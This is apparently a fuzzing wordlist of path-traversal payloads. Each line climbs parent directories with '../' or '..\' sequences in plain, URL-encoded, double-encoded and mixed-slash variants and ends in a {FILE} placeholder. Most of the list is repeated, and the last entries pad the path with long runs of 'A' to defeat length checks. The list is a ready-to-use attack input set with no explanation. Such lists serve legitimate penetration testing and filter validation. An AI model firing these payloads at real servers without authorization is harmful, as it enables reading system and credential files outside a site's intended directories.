%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
